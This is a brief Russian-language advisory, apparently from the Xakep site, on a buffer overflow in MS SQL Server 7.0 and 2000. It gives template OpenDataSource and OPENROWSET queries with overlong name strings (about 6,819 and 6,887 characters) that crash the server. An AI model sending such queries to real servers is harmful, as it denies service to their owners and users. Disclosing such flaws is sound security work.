Переполнение буфера в MS SQL Server

Рекомендуем почитать:

Xakep #304. IP-камеры на пентестах

Одна из особенностей Structured Query Language (SQL) в SQL Server 7.0 и 2000 - способность соединяться с удаленными источниками данных,
подключаться к ним можно просто указывая
имя базы (OLE DB) в запросе. Если серверу в
качестве имени передать длинную строку
символов, произойдет переполнение буфера и
как следствие - полная занятость сервера
и невозможность обслуживать запросы.

Пример:

SQL Server 7

SELECT * FROM OpenDataSource( 'XXXXXXXXXXX...' -> 6819
символов или больше ...
SELECT * FROM OPENROWSET( 'XXXXXXXXXXX...' -> 6819 символов или
больше ,'', '')

SQL Server 2000

SELECT * FROM OpenDataSource( 'XXXXXXXXXXX...' ---> 6887
...
SELECT * FROM OPENROWSET( 'XXXXXXXXXXX...' ---> 6887 ...

Переполнение буфера в MS SQL Server

Xakep #304. IP-камеры на пентестах

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Workplace OS. Вспоминаем историю самого крупного провала IBM

CVE со скоростью света. Исправляем публичный эксплоит для LiteSpeed Cache

В погоне за билетом. Как мы дважды проникли в домен, который считался неприступным

HTB Resource. Разбираемся с SSH-авторизацией по сертификату

Трюки

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Последние новости

Ликвидирован пиратский стриминговый сервис, насчитывавший 22 млн пользователей

Все больше российских пользователей сталкиваются со сталкерским ПО

Исходники macOS-стилера Banshee попали в открытый доступ

Zello просит пользователей сменить пароли

Исследователи обнаружили первый в истории Linux-буткит Bootkitty